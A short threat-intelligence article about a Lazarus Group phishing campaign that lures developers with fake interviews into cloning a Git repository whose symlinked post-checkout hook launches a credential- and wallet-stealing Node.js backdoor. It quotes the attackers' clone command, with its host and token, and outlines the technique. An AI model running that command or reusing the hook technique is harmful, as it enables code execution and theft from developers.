Lazarus Group Exploits Git Symlink Vulnerability in Advanced Phishing Campaign

Earlier this month, cybersecurity researchers identified a sophisticated phishing campaign linked to the Lazarus Group, specifically targeting developers and cryptocurrency professionals through a cleverly engineered Git symlink vulnerability. Instead of relying on conventional malware distribution methods, the attackers exploited Git’s handling of repository paths, embedding malicious hooks within symbolic links to execute code during standard operations. This approach enables the attackers to remain inconspicuous while compromising high-value targets who mistakenly believe their development processes are safe from social engineering. The initial bait involves personalised messages on professional networking platforms, inviting potential victims to partake in a mock technical interview. The conversation is designed to build trust and persuade the victim to execute a single Git clone command, leading them to a repository that contains a deceptive nested directory named api/db_drivers, which is actually a symbolic link pointing back to the repository’s .git module directory.

The attack vector was first noted by KuCoin analysts in late August, following reports of compromised private GitLab repositories. A detailed analysis revealed that the symlink exploit takes advantage of Git’s post-checkout hook mechanism to activate a concealed backdoor. By embedding a malicious post-checkout script within the symbolic link, the attackers can execute code without altering the main codebase, thereby evading standard integrity checks and static scanners. Forensic investigations confirmed that the payload establishes an encrypted connection to a remote command-and-control server, extracting credentials, system information, and wallet data back to the attackers. The exploit’s sophistication lies in its seamless integration with legitimate workflows, as victims reported that executing the command git clone –recursive https://guest:glpat-2xxxxxxyx@gitlab.tresalabs.com/product/delivery.git cd product/delivery automatically triggers the malicious hook. The embedded script, hooks/post-checkout, invokes a Node.js backdoor that maintains persistence by cleaning and replacing project files to obscure any signs of tampering, ensuring developers only see the expected code. 

Categories: Cybersecurity Threats, Phishing Attacks, Software Vulnerabilities 

Tags: Phishing, Lazarus Group, Git Symlink, Malicious Hooks, Code Execution, Social Engineering, Backdoor, Command-and-Control, Credential Theft, Exploit